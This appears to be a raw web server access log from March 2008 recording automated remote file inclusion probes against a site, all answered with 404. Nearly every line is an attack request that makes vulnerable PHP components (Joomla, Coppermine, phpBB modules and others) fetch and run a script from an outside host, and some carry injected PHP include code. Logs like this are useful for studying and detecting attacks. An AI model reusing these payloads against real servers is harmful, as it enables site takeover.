83.223.100.182 - - [02/Mar/2008:05:26:56 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:27:57 -0800] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.228.98 - - [02/Mar/2008:05:29:13 -0800] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.98 - - [02/Mar/2008:05:29:13 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.98 - - [02/Mar/2008:05:29:14 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:05:29:15 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:05:29:16 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:05:29:16 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.228.98 - - [02/Mar/2008:05:29:41 -0800] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.lennoxpetroleum.com/forum/db/db.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:05:30:12 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:05:30:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:05:30:13 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:05:30:14 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:30:14 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:30:14 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:30:15 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:05:30:15 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:05:31:03 -0800] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:31:13 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [02/Mar/2008:05:33:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:33:07 -0800] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:33:14 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:05:33:44 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:34:02 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:34:30 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:34:32 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:34:35 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:34:39 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:34:40 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:34:40 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:05:34:59 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:05:34:59 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:05:34:59 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:05:35:00 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:05:35:02 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:36:40 -0800] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.153.189.132 - - [02/Mar/2008:05:36:58 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mealsvictoria.org.au//wiki/maps/mealsvictoria.org.en/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:05:37:29 -0800] "GET /logs/access_071220.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:05:37:30 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:05:37:30 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:05:37:45 -0800] "GET /logs/access_080201.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:05:37:55 -0800] "GET /logs/access_080126.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:05:37:56 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:05:37:57 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:05:38:05 -0800] "GET /logs/access_071224.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:05:38:16 -0800] "GET /logs/access_071218.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:38:18 -0800] "GET /logs/access_080124.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:38:19 -0800] "GET /logs/access_080124.log/components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:39:38 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.200.181.3 - - [02/Mar/2008:05:40:01 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.200.181.3 - - [02/Mar/2008:05:40:02 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.200.181.3 - - [02/Mar/2008:05:40:02 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:40:06 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:40:06 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:40:06 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:05:40:13 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.73.116 - - [02/Mar/2008:05:40:19 -0800] "GET /logs/access_080119.log/classes/core/language.php?rootdir=http://noden.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [02/Mar/2008:05:40:19 -0800] "GET /classes/core/language.php?rootdir=http://noden.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [02/Mar/2008:05:40:19 -0800] "GET /logs/classes/core/language.php?rootdir=http://noden.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.187.29.51 - - [02/Mar/2008:05:41:06 -0800] "GET /plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
128.187.29.51 - - [02/Mar/2008:05:41:06 -0800] "GET /logs/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:41:22 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:05:41:35 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.200.181.3 - - [02/Mar/2008:05:42:52 -0800] "GET /logs/access_080215.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:05:43:04 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:05:43:04 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:05:43:43 -0800] "GET /logs/access_080119.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:05:43:49 -0800] "GET /logs/access_080127.log/modules/Neos_Chronos/header.php?base_folder=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.63.184 - - [02/Mar/2008:05:44:08 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suspended.by.ru/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.36.185 - - [02/Mar/2008:05:44:23 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suspended.by.ru/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.36.165 - - [02/Mar/2008:05:44:23 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suspended.by.ru/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:30 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:31 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:31 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:44:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:05:45:19 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:05:45:20 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:05:45:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:05:45:20 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:05:45:47 -0800] "GET /logs/access_071231.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.127.223.39 - - [02/Mar/2008:05:45:53 -0800] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.127.223.39 - - [02/Mar/2008:05:45:54 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.127.223.39 - - [02/Mar/2008:05:45:54 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:46:07 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:46:08 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:46:08 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:46:08 -0800] "GET /logs/access_080122.log/components/com_simpleboard/image_upload.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:46:08 -0800] "GET /components/com_simpleboard/image_upload.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:46:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:46:08 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:46:09 -0800] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
